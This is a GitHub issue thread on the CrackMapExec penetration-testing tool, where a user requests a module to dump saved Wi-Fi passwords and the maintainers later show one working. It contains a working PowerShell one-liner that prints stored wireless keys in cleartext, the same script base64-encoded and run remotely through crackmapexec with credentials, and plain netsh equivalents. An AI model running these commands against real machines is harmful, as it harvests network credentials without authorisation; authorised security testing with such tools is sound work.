### ISSUE TITLE
Request for wireless passwords

### ISSUE THREAD

**Issue by quahac** [byt3bl33d3r/CrackMapExec#305]
Hi  byt3bl33d3r,

Nice works you got here, keep on going. 

I have a Module request for wireless passwords dump. 
I have a fine working Powershell script without error handling, but it is doing his job :).
If you don't see as pull request, no problem script works fine for others.

**Powershell script**
`PS C:\Users\X\Desktop>  $results = netsh wlan show profiles | Select-String -pattern "All User Profile";foreach ($result in $results){$result = $result.ToString(); $result = $result.Split(":").TrimStart(); $result = $result[1]; netsh wlan show profile name=$result key=clear | Select-String -pattern "Key Content|SSID name"; Write-Host ""}`

**Result**
SSID name              : "My Wireless Network"
Key Content            :  SecureWirelessPassword

**Crackmapexec script**

I had to encode to push special string, that is why I did not use Powershell command option 
`crackmapexec 10.10.10.10 -u username -p password -x 'powershell -e JAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB0AHMAaAAgAHcAbABhAG4AIABzAGgAbwB3ACAAcAByAG8AZgBpAGwAZQBzACAAfAAgAFMAZQBsAGUAYwB0AC0AUwB0AHIAaQBuAGcAIAAtAHAAYQB0AHQAZQByAG4AIAAiAEEAbABsACAAVQBzAGUAcgAgAFAAcgBvAGYAaQBsAGUAIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcgBlAHMAdQBsAHQAIABpAG4AIAAkAHIAZQBzAHUAbAB0AHMAKQB7ACQAcgBlAHMAdQBsAHQAIAA9ACAAJAByAGUAcwB1AGwAdAAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwAgACQAcgBlAHMAdQBsAHQAIAA9ACAAJAByAGUAcwB1AGwAdAAuAFMAcABsAGkAdAAoACIAOgAiACkALgBUAHIAaQBtAFMAdABhAHIAdAAoACkAOwAgACQAcgBlAHMAdQBsAHQAIAA9ACAAJAByAGUAcwB1AGwAdABbADEAXQA7ACAAbgBlAHQAcwBoACAAdwBsAGEAbgAgAHMAaABvAHcAIABwAHIAbwBmAGkAbABlACAAbgBhAG0AZQA9ACQAcgBlAHMAdQBsAHQAIABrAGUAeQA9AGMAbABlAGEAcgAgAHwAIABTAGUAbABlAGMAdAAtAFMAdAByAGkAbgBnACAALQBwAGEAdAB0AGUAcgBuACAAIgBLAGUAeQAgAEMAbwBuAHQAZQBuAHQAfABTAFMASQBEACAAbgBhAG0AZQAiADsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAiAH0A'`

Regards QuaHac

**Comment by bucky67gto** [comment]
You can do that from a straight command (actually needs 2):

cme smp 10.10.10.0/24 -u Admin -p pass -x 'netsh wlan show profile'

Then use results in the next query,

cme smb 10.10.10.5 --u Admin -p pass -x 'netsh wlan show profile wifi_name key=clear'

**Comment by byt3bl33d3r** [comment]
PR's are welcome :) Feel free to submit a module!

**Comment by mpgn** [comment]
![wireless](https://user-images.githubusercontent.com/5891788/80611958-9a9e7180-8a3b-11ea-9094-0748f04e6811.png)

**Comment by mpgn** [comment]
![wireless](https://user-images.githubusercontent.com/5891788/80612896-dbe35100-8a3c-11ea-8ee9-c16421a1a73e.png)

**Comment by quahac** [comment]
Nice feature thx 🥇
